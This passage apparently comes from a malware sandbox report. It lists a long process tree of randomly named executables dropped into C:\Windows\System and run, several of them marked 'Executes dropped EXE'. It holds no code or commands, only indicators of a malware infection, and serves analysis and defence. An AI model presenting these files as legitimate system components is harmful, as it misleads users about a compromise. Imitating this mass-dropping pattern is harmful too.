  C:\Windows\System\xDZtAEl.exe
  2⤵
  - Executes dropped EXE
  PID:740
- C:\Windows\System\CMiUENl.exe
  C:\Windows\System\CMiUENl.exe
  2⤵
  - Executes dropped EXE
  PID:4916
- C:\Windows\System\KJxQgRl.exe
  C:\Windows\System\KJxQgRl.exe
  2⤵
  - Executes dropped EXE
  PID:1676
- C:\Windows\System\HxBfKab.exe
  C:\Windows\System\HxBfKab.exe
  2⤵
  - Executes dropped EXE
  PID:64
- C:\Windows\System\okApHgL.exe
  C:\Windows\System\okApHgL.exe
  2⤵
  - Executes dropped EXE
  PID:756
- C:\Windows\System\edyExEQ.exe
  C:\Windows\System\edyExEQ.exe
  2⤵
  - Executes dropped EXE
  PID:4320
- C:\Windows\System\tLcsHZl.exe
  C:\Windows\System\tLcsHZl.exe
  2⤵
  - Executes dropped EXE
  PID:4196
- C:\Windows\System\uLmuWhF.exe
  C:\Windows\System\uLmuWhF.exe
  2⤵
  - Executes dropped EXE
  PID:2492
- C:\Windows\System\tGLjPGs.exe
  C:\Windows\System\tGLjPGs.exe
  2⤵
  - Executes dropped EXE
  PID:3152
- C:\Windows\System\fyipIvY.exe
  C:\Windows\System\fyipIvY.exe
  2⤵
  - Executes dropped EXE
  PID:3244
- C:\Windows\System\QxOTegU.exe
  C:\Windows\System\QxOTegU.exe
  2⤵
  PID:4820
- C:\Windows\System\eReoPFi.exe
  C:\Windows\System\eReoPFi.exe
  2⤵
  PID:212
- C:\Windows\System\lOiblMA.exe
  C:\Windows\System\lOiblMA.exe
  2⤵
  PID:4076
- C:\Windows\System\eyPTpCB.exe
  C:\Windows\System\eyPTpCB.exe
  2⤵
  PID:2636
- C:\Windows\System\hlBRyiR.exe
  C:\Windows\System\hlBRyiR.exe
  2⤵
  PID:3176
- C:\Windows\System\HSyOfUS.exe
  C:\Windows\System\HSyOfUS.exe
  2⤵
  PID:1988
- C:\Windows\System\CEgdrhb.exe
  C:\Windows\System\CEgdrhb.exe
  2⤵
  PID:1388
- C:\Windows\System\jtDjroM.exe
  C:\Windows\System\jtDjroM.exe
  2⤵
  PID:4776
- C:\Windows\System\ZhgRWnY.exe
  C:\Windows\System\ZhgRWnY.exe
  2⤵
  PID:3664
- C:\Windows\System\QMBITjq.exe
  C:\Windows\System\QMBITjq.exe
  2⤵
  PID:4308
- C:\Windows\System\NNbWaxY.exe
  C:\Windows\System\NNbWaxY.exe
  2⤵
  PID:2328
- C:\Windows\System\IJschSk.exe
  C:\Windows\System\IJschSk.exe
  2⤵
  PID:4920
- C:\Windows\System\Vtkihmc.exe
  C:\Windows\System\Vtkihmc.exe
  2⤵
  PID:3032
- C:\Windows\System\fClofEv.exe
  C:\Windows\System\fClofEv.exe
  2⤵
  PID:5144
- C:\Windows\System\CqjTQIU.exe
  C:\Windows\System\CqjTQIU.exe
  2⤵
  PID:5172
- C:\Windows\System\WWzduaO.exe
  C:\Windows\System\WWzduaO.exe
  2⤵
  PID:5204
- C:\Windows\System\cKCsElK.exe
  C:\Windows\System\cKCsElK.exe
  2⤵
  PID:5228
- C:\Windows\System\gwlOxBw.exe
  C:\Windows\System\gwlOxBw.exe
  2⤵
  PID:5256
- C:\Windows\System\uCXGEWY.exe
  C:\Windows\System\uCXGEWY.exe
  2⤵
  PID:5292
- C:\Windows\System\KDONZTD.exe
  C:\Windows\System\KDONZTD.exe
  2⤵
  PID:5312
- C:\Windows\System\dgkoQYK.exe
  C:\Windows\System\dgkoQYK.exe
  2⤵
  PID:5340
- C:\Windows\System\HZyrjCv.exe
  C:\Windows\System\HZyrjCv.exe
  2⤵
  PID:5364
- C:\Windows\System\DewjMIh.exe
  C:\Windows\System\DewjMIh.exe
  2⤵
  PID:5392
- C:\Windows\System\bovVGMD.exe
  C:\Windows\System\bovVGMD.exe
  2⤵
  PID:5420
- C:\Windows\System\emuPECS.exe
  C:\Windows\System\emuPECS.exe
  2⤵
  PID:5448
- C:\Windows\System\OdDVUyQ.exe
  C:\Windows\System\OdDVUyQ.exe
  2⤵
  PID:5480
- C:\Windows\System\lwGvFOU.exe
  C:\Windows\System\lwGvFOU.exe
  2⤵
  PID:5504
- C:\Windows\System\PaZcxHA.exe
  C:\Windows\System\PaZcxHA.exe
  2⤵
  PID:5532
- C:\Windows\System\mTJntwC.exe
  C:\Windows\System\mTJntwC.exe
  2⤵
  PID:5560
- C:\Windows\System\zvlyJaw.exe
  C:\Windows\System\zvlyJaw.exe
  2⤵
  PID:5588
- C:\Windows\System\hjwCxPQ.exe
  C:\Windows\System\hjwCxPQ.exe
  2⤵
  PID:5616
- C:\Windows\System\tpmcqtx.exe
  C:\Windows\System\tpmcqtx.exe
  2⤵
  PID:5644
- C:\Windows\System\nxxrCOI.exe
  C:\Windows\System\nxxrCOI.exe
  2⤵
  PID:5672
- C:\Windows\System\xZTiDCi.exe
  C:\Windows\System\xZTiDCi.exe
  2⤵
  PID:5700
- C:\Windows\System\uQFkVIV.exe
  C:\Windows\System\uQFkVIV.exe
  2⤵
  PID:5732
- C:\Windows\System\SHoAkrK.exe
  C:\Windows\System\SHoAkrK.exe
  2⤵
  PID:5756
- C:\Windows\System\OJEIXvI.exe
  C:\Windows\System\OJEIXvI.exe
  2⤵
  PID:5820
- C:\Windows\System\XutrpaH.exe
  C:\Windows\System\XutrpaH.exe
  2⤵
  PID:5864
- C:\Windows\System\mqPACKH.exe
  C:\Windows\System\mqPACKH.exe
  2⤵
  PID:5892
- C:\Windows\System\EBnpWdl.exe
  C:\Windows\System\EBnpWdl.exe
  2⤵
  PID:5920
- C:\Windows\System\UijeGkC.exe
  C:\Windows\System\UijeGkC.exe
  2⤵
  PID:5972
- C:\Windows\System\LcAaybP.exe
  C:\Windows\System\LcAaybP.exe
  2⤵
  PID:5992
- C:\Windows\System\sHrOfZW.exe
  C:\Windows\System\sHrOfZW.exe
  2⤵
  PID:6008
- C:\Windows\System\CrWkAby.exe
  C:\Windows\System\CrWkAby.exe
  2⤵
  PID:6024
- C:\Windows\System\zwXceYW.exe
  C:\Windows\System\zwXceYW.exe
  2⤵
  PID:6056
- C:\Windows\System\lsEkHXc.exe
  C:\Windows\System\lsEkHXc.exe
  2⤵
  PID:6096
- C:\Windows\System\oooBNjn.exe
  C:\Windows\System\oooBNjn.exe
  2⤵
  PID:6112
- C:\Windows\System\eIauAbm.exe
  C:\Windows\System\eIauAbm.exe
  2⤵
  PID:6132
- C:\Windows\System\YlQlXrJ.exe
  C:\Windows\System\YlQlXrJ.exe
  2⤵
  PID:1500
- C:\Windows\System\GwdrJum.exe
  C:\Windows\System\GwdrJum.exe
  2⤵
  PID:2932
- C:\Windows\System\emFFowo.exe
  C:\Windows\System\emFFowo.exe
  2⤵
  PID:1080
- C:\Windows\System\UNElwOj.exe
  C:\Windows\System\UNElwOj.exe
  2⤵
  PID:4836
- C:\Windows\System\jdVdUwR.exe
  C:\Windows\System\jdVdUwR.exe
  2⤵
  PID:5188
- C:\Windows\System\UZBJHIP.exe
  C:\Windows\System\UZBJHIP.exe
  2⤵
  PID:5240
- C:\Windows\System\pXbGWEc.exe
  C:\Windows\System\pXbGWEc.exe
  2⤵
  PID:5276
- C:\Windows\System\uNazJGa.exe
  C:\Windows\System\uNazJGa.exe
  2⤵
  PID:5352
- C:\Windows\System\MzOHJcc.exe
  C:\Windows\System\MzOHJcc.exe
  2⤵
  PID:5388
- C:\Windows\System\atUnFwh.exe
  C:\Windows\System\atUnFwh.exe
  2⤵
  PID:3528
- C:\Windows\System\FXwTQnX.exe
  C:\Windows\System\FXwTQnX.exe
  2⤵
  PID:5468
- C:\Windows\System\MIUKMgM.exe
  C:\Windows\System\MIUKMgM.exe
  2⤵
  PID:5496
- C:\Windows\System\LqnNqyT.exe
  C:\Windows\System\LqnNqyT.exe
  2⤵
  PID:5548
- C:\Windows\System\zNjCsAl.exe
  C:\Windows\System\zNjCsAl.exe
  2⤵
  PID:5036
- C:\Windows\System\QdYCdmS.exe
  C:\Windows\System\QdYCdmS.exe
  2⤵
  PID:1964
- C:\Windows\System\rIQvPFy.exe
  C:\Windows\System\rIQvPFy.exe
  2⤵
  PID:1064
- C:\Windows\System\OBXTQRq.exe
  C:\Windows\System\OBXTQRq.exe
  2⤵
  PID:2016
- C:\Windows\System\qXYQwVb.exe
  C:\Windows\System\qXYQwVb.exe
  2⤵
  PID:5780
- C:\Windows\System\gFmHxXa.exe
  C:\Windows\System\gFmHxXa.exe
  2⤵
  PID:1700
- C:\Windows\System\QppCdqF.exe
  C:\Windows\System\QppCdqF.exe
  2⤵
  PID:636
- C:\Windows\System\rJoPsrK.exe
  C:\Windows\System\rJoPsrK.exe
  2⤵
  PID:5844
- C:\Windows\System\dzMVkei.exe
  C:\Windows\System\dzMVkei.exe
  2⤵
  PID:5852
- C:\Windows\System\RBtSzPQ.exe
  C:\Windows\System\RBtSzPQ.exe
  2⤵
  PID:3692
- C:\Windows\System\IuRSUeN.exe
  C:\Windows\System\IuRSUeN.exe
  2⤵
  PID:5984
- C:\Windows\System\jthoBES.exe
  C:\Windows\System\jthoBES.exe
  2⤵
  PID:6036
- C:\Windows\System\KDGeCPV.exe
  C:\Windows\System\KDGeCPV.exe
  2⤵
  PID:4028
- C:\Windows\System\gBpxbex.exe
  C:\Windows\System\gBpxbex.exe
  2⤵
  PID:4484
- C:\Windows\System\OJSkTkS.exe
  C:\Windows\System\OJSkTkS.exe
  2⤵
  PID:5008
- C:\Windows\System\nRcbUYG.exe
  C:\Windows\System\nRcbUYG.exe
  2⤵
  PID:1564
- C:\Windows\System\wFPpHRl.exe
  C:\Windows\System\wFPpHRl.exe
  2⤵
  PID:1320
- C:\Windows\System\jFPGrZL.exe
  C:\Windows\System\jFPGrZL.exe
  2⤵
  PID:5128
- C:\Windows\System\GAKeLgE.exe
  C:\Windows\System\GAKeLgE.exe
  2⤵
  PID:2984
- C:\Windows\System\yQfhpFc.exe
  C:\Windows\System\yQfhpFc.exe
  2⤵
  PID:5356
- C:\Windows\System\jpKPwcS.exe
  C:\Windows\System\jpKPwcS.exe
  2⤵
  PID:2600
- C:\Windows\System\meDfLrD.exe
  C:\Windows\System\meDfLrD.exe
  2⤵
  PID:5520
- C:\Windows\System\DbcHfwL.exe
  C:\Windows\System\DbcHfwL.exe
  2⤵
  PID:5584
- C:\Windows\System\tJRgSkP.exe
  C:\Windows\System\tJRgSkP.exe
  2⤵
  PID:5804
- C:\Windows\System\qcJDKeG.exe
  C:\Windows\System\qcJDKeG.exe
  2⤵
  PID:3968
- C:\Windows\System\oarLIzT.exe
  C:\Windows\System\oarLIzT.exe
  2⤵
  PID:3876
- C:\Windows\System\AhsaJeW.exe
  C:\Windows\System\AhsaJeW.exe
  2⤵
  PID:3676
- C:\Windows\System\lpNxzjo.exe
  C:\Windows\System\lpNxzjo.exe
  2⤵
  PID:4796
- C:\Windows\System\bXpNBji.exe
  C:\Windows\System\bXpNBji.exe
  2⤵
  PID:2540
- C:\Windows\System\UURGZfX.exe
  C:\Windows\System\UURGZfX.exe
  2⤵
  PID:4420
- C:\Windows\System\aWoiSFr.exe
  C:\Windows\System\aWoiSFr.exe
  2⤵
  PID:5268
- C:\Windows\System\DqByWJK.exe
  C:\Windows\System\DqByWJK.exe
  2⤵
  PID:4828
- C:\Windows\System\uiwSluX.exe
  C:\Windows\System\uiwSluX.exe
  2⤵
  PID:4180
- C:\Windows\System\GwhPUnK.exe
  C:\Windows\System\GwhPUnK.exe
  2⤵
  PID:5912
- C:\Windows\System\LAYefKP.exe
  C:\Windows\System\LAYefKP.exe
  2⤵
  PID:6048
- C:\Windows\System\Rfpgwqe.exe
  C:\Windows\System\Rfpgwqe.exe
  2⤵
  PID:4008
- C:\Windows\System\pXOrpWp.exe
  C:\Windows\System\pXOrpWp.exe
  2⤵
  PID:5332
- C:\Windows\System\UXJfOUR.exe
  C:\Windows\System\UXJfOUR.exe
  2⤵
  PID:5576
- C:\Windows\System\HteAknm.exe
  C:\Windows\System\HteAknm.exe
  2⤵
  PID:1508
- C:\Windows\System\SShmkMo.exe
  C:\Windows\System\SShmkMo.exe
  2⤵
  PID:3572
- C:\Windows\System\XtXDVTL.exe
  C:\Windows\System\XtXDVTL.exe
  2⤵
  PID:3636
- C:\Windows\System\nomQwOr.exe
  C:\Windows\System\nomQwOr.exe
  2⤵
  PID:6172
- C:\Windows\System\ZTazRkQ.exe
  C:\Windows\System\ZTazRkQ.exe
  2⤵
  PID:6232
- C:\Windows\System\vqRoXfG.exe
  C:\Windows\System\vqRoXfG.exe
  2⤵
  PID:6248
- C:\Windows\System\vUYMAih.exe
  C:\Windows\System\vUYMAih.exe
  2⤵
  PID:6268
- C:\Windows\System\VJgxcZX.exe
  C:\Windows\System\VJgxcZX.exe
  2⤵
  PID:6288
- C:\Windows\System\AgWLzfb.exe
  C:\Windows\System\AgWLzfb.exe
  2⤵
  PID:6304
- C:\Windows\System\NAUnCXm.exe
  C:\Windows\System\NAUnCXm.exe
  2⤵
  PID:6332
- C:\Windows\System\HsXkmRZ.exe
  C:\Windows\System\HsXkmRZ.exe
  2⤵
  PID:6360
- C:\Windows\System\UinpJrT.exe
  C:\Windows\System\UinpJrT.exe
  2⤵
  PID:6376
- C:\Windows\System\gnUXscf.exe
  C:\Windows\System\gnUXscf.exe
  2⤵
  PID:6400
- C:\Windows\System\SyhckDv.exe
  C:\Windows\System\SyhckDv.exe
  2⤵
  PID:6420
- C:\Windows\System\xNnnAOm.exe
  C:\Windows\System\xNnnAOm.exe
  2⤵
  PID:6448
- C:\Windows\System\quqINGg.exe
  C:\Windows\System\quqINGg.exe
  2⤵
  PID:6476
- C:\Windows\System\UEJsCPk.exe
  C:\Windows\System\UEJsCPk.exe
  2⤵
  PID:6532
- C:\Windows\System\CoJchjS.exe
  C:\Windows\System\CoJchjS.exe
  2⤵
  PID:6564
- C:\Windows\System\JaQDKUa.exe
  C:\Windows\System\JaQDKUa.exe
  2⤵
  PID:6620
- C:\Windows\System\jQoKRwp.exe
  C:\Windows\System\jQoKRwp.exe
  2⤵
  PID:6644
- C:\Windows\System\nqsDhQD.exe
  C:\Windows\System\nqsDhQD.exe
  2⤵
  PID:6668
- C:\Windows\System\VLzEWHl.exe
  C:\Windows\System\VLzEWHl.exe
  2⤵
  PID:6688
- C:\Windows\System\BhoYmTv.exe
  C:\Windows\System\BhoYmTv.exe
  2⤵
  PID:6732
- C:\Windows\System\WdpqHTO.exe
  C:\Windows\System\WdpqHTO.exe
  2⤵
  PID:6748
- C:\Windows\System\gBZwsEJ.exe
  C:\Windows\System\gBZwsEJ.exe
  2⤵
  PID:6772
- C:\Windows\System\Adsafxg.exe
  C:\Windows\System\Adsafxg.exe
  2⤵
  PID:6816
- C:\Windows\System\ucgZzmW.exe
  C:\Windows\System\ucgZzmW.exe
  2⤵
  PID:6840
- C:\Windows\System\dVpwoJl.exe
  C:\Windows\System\dVpwoJl.exe
  2⤵
  PID:6864
- C:\Windows\System\rZsJIkY.exe
  C:\Windows\System\rZsJIkY.exe
  2⤵
  PID:6900
- C:\Windows\System\fHXxGxx.exe
  C:\Windows\System\fHXxGxx.exe
  2⤵
  PID:6944
- C:\Windows\System\albovOj.exe
  C:\Windows\System\albovOj.exe
  2⤵
  PID:6968
- C:\Windows\System\SbeMXgs.exe
  C:\Windows\System\SbeMXgs.exe
  2⤵
  PID:6992
- C:\Windows\System\ZirnSeh.exe
  C:\Windows\System\ZirnSeh.exe
  2⤵
  PID:7012
- C:\Windows\System\SkHGQym.exe
  C:\Windows\System\SkHGQym.exe
  2⤵
  PID:7052
- C:\Windows\System\NpyesjW.exe
  C:\Windows\System\NpyesjW.exe
  2⤵
  PID:7076
- C:\Windows\System\mbmiTdP.exe
  C:\Windows\System\mbmiTdP.exe
  2⤵
  PID:7116
- C:\Windows\System\eMMWfGG.exe
  C:\Windows\System\eMMWfGG.exe
  2⤵
  PID:7136
- C:\Windows\System\EyeyYNp.exe
  C:\Windows\System\EyeyYNp.exe
  2⤵
  PID:5060
- C:\Windows\System\LQZUDQM.exe
  C:\Windows\System\LQZUDQM.exe
  2⤵
  PID:2096
- C:\Windows\System\jukCXZd.exe
  C:\Windows\System\jukCXZd.exe
  2⤵
  PID:6152
- C:\Windows\System\pnEyEWt.exe
  C:\Windows\System\pnEyEWt.exe
  2⤵
  PID:6228
- C:\Windows\System\lteUZQz.exe
  C:\Windows\System\lteUZQz.exe
  2⤵
  PID:6240
- C:\Windows\System\nmzdLts.exe
  C:\Windows\System\nmzdLts.exe
  2⤵
  PID:6280
- C:\Windows\System\ylqfiFb.exe
  C:\Windows\System\ylqfiFb.exe
  2⤵
  PID:6348
- C:\Windows\System\ylyzHMU.exe
  C:\Windows\System\ylyzHMU.exe
  2⤵
  PID:6392
- C:\Windows\System\XgohGca.exe
  C:\Windows\System\XgohGca.exe
  2⤵
  PID:6436
- C:\Windows\System\uVVakZI.exe
  C:\Windows\System\uVVakZI.exe
  2⤵
  PID:6440
- C:\Windows\System\edxwtFc.exe
  C:\Windows\System\edxwtFc.exe
  2⤵
  PID:6576
- C:\Windows\System\KAMMcNB.exe
  C:\Windows\System\KAMMcNB.exe
  2⤵
  PID:6756
- C:\Windows\System\aKPEmJU.exe
  C:\Windows\System\aKPEmJU.exe
  2⤵
  PID:6760
- C:\Windows\System\ucwphqq.exe
  C:\Windows\System\ucwphqq.exe
  2⤵
  PID:6832
- C:\Windows\System\TISaUYK.exe
  C:\Windows\System\TISaUYK.exe
  2⤵
  PID:6896
- C:\Windows\System\MdmZaVh.exe
  C:\Windows\System\MdmZaVh.exe
  2⤵
  PID:7060
- C:\Windows\System\fWzSqfH.exe
  C:\Windows\System\fWzSqfH.exe
  2⤵
  PID:7072
- C:\Windows\System\oEkrJBw.exe
  C:\Windows\System\oEkrJBw.exe
  2⤵
  PID:7132
- C:\Windows\System\XdRRHjm.exe
  C:\Windows\System\XdRRHjm.exe
  2⤵
  PID:6148
- C:\Windows\System\vPHPEmm.exe
  C:\Windows\System\vPHPEmm.exe
  2⤵
  PID:6312
- C:\Windows\System\dEuBslk.exe
  C:\Windows\System\dEuBslk.exe
  2⤵
  PID:6368
- C:\Windows\System\mzPQyOm.exe
  C:\Windows\System\mzPQyOm.exe
  2⤵
  PID:2376
- C:\Windows\System\yXgeyym.exe
  C:\Windows\System\yXgeyym.exe
  2⤵
  PID:6520
- C:\Windows\System\RTCkfgR.exe
  C:\Windows\System\RTCkfgR.exe
  2⤵
  PID:832
- C:\Windows\System\grVjWWC.exe
  C:\Windows\System\grVjWWC.exe
  2⤵
  PID:6852
- C:\Windows\System\lUeCBQu.exe
  C:\Windows\System\lUeCBQu.exe
  2⤵
  PID:6936
- C:\Windows\System\bRGCRKY.exe
  C:\Windows\System\bRGCRKY.exe
  2⤵
  PID:7112
- C:\Windows\System\mAzWBiq.exe
  C:\Windows\System\mAzWBiq.exe
  2⤵
  PID:1740
- C:\Windows\System\jeDabZj.exe
  C:\Windows\System\jeDabZj.exe
  2⤵
  PID:6908
- C:\Windows\System\qSgGtMo.exe
  C:\Windows\System\qSgGtMo.exe
  2⤵
  PID:7104
- C:\Windows\System\BjVUeVY.exe
  C:\Windows\System\BjVUeVY.exe
  2⤵
  PID:7008
- C:\Windows\System\rcyphEm.exe
  C:\Windows\System\rcyphEm.exe
  2⤵
  PID:7176
- C:\Windows\System\BATVAVn.exe
  C:\Windows\System\BATVAVn.exe
  2⤵
  PID:7200
- C:\Windows\System\SrNKIyX.exe
  C:\Windows\System\SrNKIyX.exe
  2⤵
  PID:7216
- C:\Windows\System\eveODuC.exe
  C:\Windows\System\eveODuC.exe
  2⤵
  PID:7232
- C:\Windows\System\JnUEaGQ.exe
  C:\Windows\System\JnUEaGQ.exe
  2⤵
  PID:7296
- C:\Windows\System\sXaSoDE.exe
  C:\Windows\System\sXaSoDE.exe
  2⤵
  PID:7316
- C:\Windows\System\zidjwrO.exe
  C:\Windows\System\zidjwrO.exe
  2⤵
  PID:7340
- C:\Windows\System\OlmUUHn.exe
  C:\Windows\System\OlmUUHn.exe
  2⤵
  PID:7376
- C:\Windows\System\yyjZbfX.exe
  C:\Windows\System\yyjZbfX.exe
  2⤵
  PID:7392
- C:\Windows\System\ahdZRKO.exe
  C:\Windows\System\ahdZRKO.exe
  2⤵
  PID:7424
- C:\Windows\System\wdCwugh.exe
  C:\Windows\System\wdCwugh.exe
  2⤵
  PID:7440
- C:\Windows\System\FhJfjNT.exe
  C:\Windows\System\FhJfjNT.exe
  2⤵
  PID:7464
- C:\Windows\System\NUFSvzi.exe
  C:\Windows\System\NUFSvzi.exe
  2⤵
  PID:7488
- C:\Windows\System\UCZVpHv.exe
  C:\Windows\System\UCZVpHv.exe
  2⤵
  PID:7504
- C:\Windows\System\gKhfpMn.exe
  C:\Windows\System\gKhfpMn.exe
  2⤵
  PID:7532
- C:\Windows\System\rHAoHkr.exe
  C:\Windows\System\rHAoHkr.exe
  2⤵
  PID:7560
- C:\Windows\System\XGnXzcX.exe
  C:\Windows\System\XGnXzcX.exe
  2⤵
  PID:7584
- C:\Windows\System\olCjTJO.exe
  C:\Windows\System\olCjTJO.exe
  2⤵
  PID:7616
- C:\Windows\System\gkhZwUU.exe
  C:\Windows\System\gkhZwUU.exe
  2⤵
  PID:7640
- C:\Windows\System\AjDiNJc.exe
  C:\Windows\System\AjDiNJc.exe
  2⤵
  PID:7660
- C:\Windows\System\vsqIjrD.exe
  C:\Windows\System\vsqIjrD.exe
  2⤵
  PID:7680
- C:\Windows\System\lftgjlA.exe
  C:\Windows\System\lftgjlA.exe
  2⤵
  PID:7728
- C:\Windows\System\UZEPhcM.exe
  C:\Windows\System\UZEPhcM.exe
  2⤵
  PID:7784
- C:\Windows\System\wnIJGEN.exe
  C:\Windows\System\wnIJGEN.exe
  2⤵
  PID:7836
- C:\Windows\System\TudsqNJ.exe
  C:\Windows\System\TudsqNJ.exe
  2⤵
  PID:7872
- C:\Windows\System\NyaaINa.exe
  C:\Windows\System\NyaaINa.exe
  2⤵
  PID:7896
- C:\Windows\System\GCjNPhS.exe
  C:\Windows\System\GCjNPhS.exe
  2⤵
  PID:7916
- C:\Windows\System\ZpMlrfx.exe
  C:\Windows\System\ZpMlrfx.exe
  2⤵
  PID:7936
- C:\Windows\System\bEEOGZK.exe
  C:\Windows\System\bEEOGZK.exe
  2⤵
  PID:7960
- C:\Windows\System\puIaaKk.exe
  C:\Windows\System\puIaaKk.exe
  2⤵
  PID:8004
- C:\Windows\System\zwyOMnE.exe
  C:\Windows\System\zwyOMnE.exe
  2⤵
  PID:8032
- C:\Windows\System\eXiBfPv.exe
  C:\Windows\System\eXiBfPv.exe
  2⤵
  PID:8056
- C:\Windows\System\rtsbJnV.exe
  C:\Windows\System\rtsbJnV.exe
  2⤵
  PID:8096
- C:\Windows\System\GtNaINN.exe
  C:\Windows\System\GtNaINN.exe
  2⤵
  PID:8112
- C:\Windows\System\QtJzjEJ.exe
  C:\Windows\System\QtJzjEJ.exe
  2⤵
  PID:8132
- C:\Windows\System\LatWxdI.exe
  C:\Windows\System\LatWxdI.exe
  2⤵
  PID:8168
- C:\Windows\System\PTMrVvF.exe
  C:\Windows\System\PTMrVvF.exe
  2⤵
  PID:7208
- C:\Windows\System\MMRiYtv.exe
  C:\Windows\System\MMRiYtv.exe
  2⤵
  PID:7228
- C:\Windows\System\gtLboBM.exe
  C:\Windows\System\gtLboBM.exe
  2⤵
  PID:7336
- C:\Windows\System\csQQeVE.exe
  C:\Windows\System\csQQeVE.exe
  2⤵
  PID:7388
- C:\Windows\System\qCbVIRw.exe
  C:\Windows\System\qCbVIRw.exe
  2⤵
  PID:7456
- C:\Windows\System\SFIIXjG.exe
  C:\Windows\System\SFIIXjG.exe
  2⤵
  PID:7496
- C:\Windows\System\ldIBCHR.exe
  C:\Windows\System\ldIBCHR.exe
  2⤵
  PID:7552
- C:\Windows\System\BIwuUVB.exe
  C:\Windows\System\BIwuUVB.exe
  2⤵
  PID:7696
- C:\Windows\System\fXnPCVT.exe
  C:\Windows\System\fXnPCVT.exe
  2⤵
  PID:7672
- C:\Windows\System\COPoZwH.exe
  C:\Windows\System\COPoZwH.exe
  2⤵
  PID:7748
- C:\Windows\System\UiBjZeL.exe
  C:\Windows\System\UiBjZeL.exe
  2⤵
  PID:7756
- C:\Windows\System\sALvxam.exe
  C:\Windows\System\sALvxam.exe
  2⤵
  PID:7848
- C:\Windows\System\kpKbtRK.exe
  C:\Windows\System\kpKbtRK.exe
  2⤵
  PID:7912
- C:\Windows\System\zMMJyUL.exe
  C:\Windows\System\zMMJyUL.exe
  2⤵
  PID:8028
- C:\Windows\System\WRMgDIw.exe
  C:\Windows\System\WRMgDIw.exe
  2⤵
  PID:8044
- C:\Windows\System\flpJwwA.exe
  C:\Windows\System\flpJwwA.exe
  2⤵
  PID:8124
- C:\Windows\System\HuFidjv.exe
  C:\Windows\System\HuFidjv.exe
  2⤵
  PID:8156
- C:\Windows\System\qSUpNBO.exe
  C:\Windows\System\qSUpNBO.exe
  2⤵
  PID:7248
- C:\Windows\System\EFYZuyn.exe
  C:\Windows\System\EFYZuyn.exe
  2⤵
  PID:7332
- C:\Windows\System\YUPoBUK.exe
  C:\Windows\System\YUPoBUK.exe
  2⤵
  PID:7448
- C:\Windows\System\LSNolzx.exe
  C:\Windows\System\LSNolzx.exe
  2⤵
  PID:7580
- C:\Windows\System\udMpQiL.exe
  C:\Windows\System\udMpQiL.exe
  2⤵
  PID:7676
- C:\Windows\System\xtyJrIK.exe
  C:\Windows\System\xtyJrIK.exe
  2⤵
  PID:6876
- C:\Windows\System\KTEKSZL.exe
  C:\Windows\System\KTEKSZL.exe
  2⤵
  PID:8128
- C:\Windows\System\kpwPGKY.exe
  C:\Windows\System\kpwPGKY.exe
  2⤵
  PID:7312
- C:\Windows\System\wnTlcRu.exe
  C:\Windows\System\wnTlcRu.exe
  2⤵
  PID:7948
- C:\Windows\System\bMQvxsr.exe
  C:\Windows\System\bMQvxsr.exe
  2⤵
  PID:7512
- C:\Windows\System\tUCyRtn.exe
  C:\Windows\System\tUCyRtn.exe
  2⤵
  PID:8220
- C:\Windows\System\kNnIjSj.exe
  C:\Windows\System\kNnIjSj.exe
  2⤵
  PID:8260
- C:\Windows\System\woIdmba.exe
  C:\Windows\System\woIdmba.exe
  2⤵
  PID:8280
- C:\Windows\System\RHrJvxd.exe
  C:\Windows\System\RHrJvxd.exe
  2⤵
  PID:8304
- C:\Windows\System\AddDwyV.exe
  C:\Windows\System\AddDwyV.exe
  2⤵
  PID:8324
- C:\Windows\System\UXOwGJr.exe
  C:\Windows\System\UXOwGJr.exe
  2⤵
  PID:8356
- C:\Windows\System\aamOsmu.exe
  C:\Windows\System\aamOsmu.exe
  2⤵
  PID:8372
- C:\Windows\System\layhDZF.exe
  C:\Windows\System\layhDZF.exe
  2⤵
  PID:8396
- C:\Windows\System\XKQmIaJ.exe
  C:\Windows\System\XKQmIaJ.exe
  2⤵
  PID:8452
- C:\Windows\System\dJKbTjb.exe
  C:\Windows\System\dJKbTjb.exe
  2⤵
  PID:8468
- C:\Windows\System\sFpFeRW.exe
  C:\Windows\System\sFpFeRW.exe
  2⤵
  PID:8484
- C:\Windows\System\fFmplHH.exe
  C:\Windows\System\fFmplHH.exe
  2⤵
  PID:8500
- C:\Windows\System\JIYLouq.exe
  C:\Windows\System\JIYLouq.exe
  2⤵
  PID:8516
- C:\Windows\System\BhgDVnF.exe
  C:\Windows\System\BhgDVnF.exe
  2⤵
  PID:8536
- C:\Windows\System\zxbKqZa.exe
  C:\Windows\System\zxbKqZa.exe
  2⤵
  PID:8572
- C:\Windows\System\WvOmQzU.exe
  C:\Windows\System\WvOmQzU.exe
  2⤵
  PID:8636
- C:\Windows\System\lTHodPl.exe
  C:\Windows\System\lTHodPl.exe
  2⤵
  PID:8656
- C:\Windows\System\YWvxfhy.exe
  C:\Windows\System\YWvxfhy.exe
  2⤵
  PID:8684
- C:\Windows\System\dkhSNvx.exe
  C:\Windows\System\dkhSNvx.exe
  2⤵
  PID:8708
- C:\Windows\System\InsQZeU.exe
  C:\Windows\System\InsQZeU.exe
  2⤵
  PID:8724
- C:\Windows\System\RRrCsVa.exe
  C:\Windows\System\RRrCsVa.exe
  2⤵
  PID:8764
- C:\Windows\System\zYuOPua.exe
  C:\Windows\System\zYuOPua.exe
  2⤵
  PID:8836
- C:\Windows\System\rdIGlmj.exe
  C:\Windows\System\rdIGlmj.exe
  2⤵
  PID:8932
- C:\Windows\System\XQvvkZH.exe
  C:\Windows\System\XQvvkZH.exe
  2⤵
  PID:8948
- C:\Windows\System\xGCMNne.exe
  C:\Windows\System\xGCMNne.exe
  2⤵
  PID:8968
- C:\Windows\System\UCbTvfd.exe
  C:\Windows\System\UCbTvfd.exe
  2⤵
  PID:8996
- C:\Windows\System\aGZdydr.exe
  C:\Windows\System\aGZdydr.exe
  2⤵
  PID:9024
- C:\Windows\System\XPcbiCg.exe
  C:\Windows\System\XPcbiCg.exe
  2⤵
  PID:9056
- C:\Windows\System\kTvXZbB.exe
  C:\Windows\System\kTvXZbB.exe
  2⤵
  PID:9084
- C:\Windows\System\cATUbwZ.exe
  C:\Windows\System\cATUbwZ.exe
  2⤵
  PID:9104
- C:\Windows\System\PsvqKYq.exe
  C:\Windows\System\PsvqKYq.exe
  2⤵
  PID:9132
- C:\Windows\System\XOeYZHn.exe
  C:\Windows\System\XOeYZHn.exe
  2⤵
  PID:9172
- C:\Windows\System\vhNysIY.exe
  C:\Windows\System\vhNysIY.exe
  2⤵
  PID:9188
- C:\Windows\System\VatMYiQ.exe
  C:\Windows\System\VatMYiQ.exe
  2⤵
  PID:9204
- C:\Windows\System\DmExTJC.exe
